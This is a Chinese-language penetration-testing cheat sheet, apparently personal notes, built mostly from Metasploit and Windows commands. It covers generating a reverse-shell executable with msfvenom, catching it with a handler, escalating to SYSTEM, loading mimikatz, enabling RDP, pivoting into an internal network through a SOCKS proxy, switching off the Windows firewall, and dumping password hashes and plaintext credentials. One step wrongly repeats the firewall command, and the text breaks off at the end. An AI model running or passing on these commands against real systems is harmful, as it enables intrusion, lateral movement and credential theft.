一、msfvenom

  1. 生成反弹shell
1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.1 lport=4444 -f exe -o re.exe

二、msfcosole

  1. msfcosole上线,监听msfvenom生成的反弹shell
1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.10.1
set lport 4444
run
  1. msfconsole提权

普通提权

1
2
getuid				# 查看当前用户uid
getsystem			# 提权为systeem

通过迁移进程提权

1
ps 					# 查看进程

若 PID=360, User 为 NT AUTHORITY\SYSTEM ,只要将 反弹shell 迁移到这个进程即可。

1
migrate 360			# 迁移到 PID 为360的进程
  1. 加载 mimikatz
1
load mimikatz
  1. 开启 3389 端口
1
run /post/windows/manage/enabled_rdp
  1. 设置跳板机

meterpreter 的版本不同命令也有差异

1
2
3
4
5
6
7
8
# 获取 win7 路由
run get_local_subnets
# 将路由添加到本地
run post/multi/manage/autoroute
# 查看添加的路由
run autoroute -p
# 打印路由
route print
  1. 构建内网通道

因为将跳板机的路由添加到了本地,所以本机拥有两个ip,故监听0.0.0.0,两个ip地址都能访问该服务

1
2
3
4
5
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1080
set version 4a
run

然后配置好proxychains4,这时,可以用 msf 的模块进行探测,但是速度不如 proxychains4 + nmap

msfcosole 使用如下:

1
2
3
4
use auxiliary/scanner/portscan/tcp
set rhosts 目标ip
set rports 440-449
run
  1. msf 扫描软件
1
run post/windows/gather/enum_applications
  1. msf 扫描 C 段
1
run post/windows/gather/arp_scanner        rhosts=192.168.52.0/24

proxychains4

  1. 配置 proxychains4
1
vim /etc/proxychains4.conf
  1. 使用 proxychains4 探测是否设置成功

除了能用 nmap 探测,还能用 curl 探测,但不可以使用 ping 探测是否代理成功,因为 ping 使用 icmp 协议

1
proxychains4 nmap -Pn -sT 目标ip -p445

蚁剑

  1. 关闭防火墙
1
netsh advfirewall set allprofiles state off
  1. 查看是否有杀软
1
netsh advfirewall set allprofiles state off

或者 

1
tasklist /svc
  1. 开启 3389 端口
1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  1. 查看端口是否开启成功
1
netstat -ano | find "3389"
  1. 改变编码方式,防止乱码
1
chcp 65001

mimikatz

  1. 获取密码的hash值

Kiwi Commands

1
creds_msv

Password database Commands

1
hashdump
  1. 获取明文密码

Kiwi Commands

1
2
3
creds_kerberos
creds_wdigest
creds_tspkg

kail

  1. 远程登录
1
rdesk ip

在线辅助网站

  1. Windows 杀软在线对比网站